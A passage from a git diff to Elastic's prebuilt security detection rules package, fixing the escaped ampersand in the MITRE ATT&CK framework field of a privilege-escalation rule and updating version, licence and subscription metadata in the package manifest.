 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_3.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_3.json
index 6545c5fb4f1..550e7487f17 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_3.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_4.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_4.json
index 2c28bc4d597..c38fb93df02 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_4.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/manifest.yml b/packages/security_detection_engine/manifest.yml
index d4857e2a72f..92b2e9455e2 100644
--- a/packages/security_detection_engine/manifest.yml
+++ b/packages/security_detection_engine/manifest.yml
@@ -1,18 +1,22 @@
 categories:
 - security
 conditions:
-  kibana.version: ^8.11.0
+  elastic:
+    subscription: basic
+  kibana:
+    version: ^8.12.0
 description: Prebuilt detection rules for Elastic Security
-format_version: 1.0.0
+format_version: 3.0.0
 icons:
 - size: 16x16
   src: /img/security-logo-color-64px.svg
   type: image/svg+xml
-license: basic
 name: security_detection_engine
 owner:
   github: elastic/protections
-release: ga
+  type: elastic
+source:
+  license: Elastic-2.0
 title: Prebuilt Security Detection Rules
 type: integration
-version: 8.11.4
+version: 8.12.1-beta.1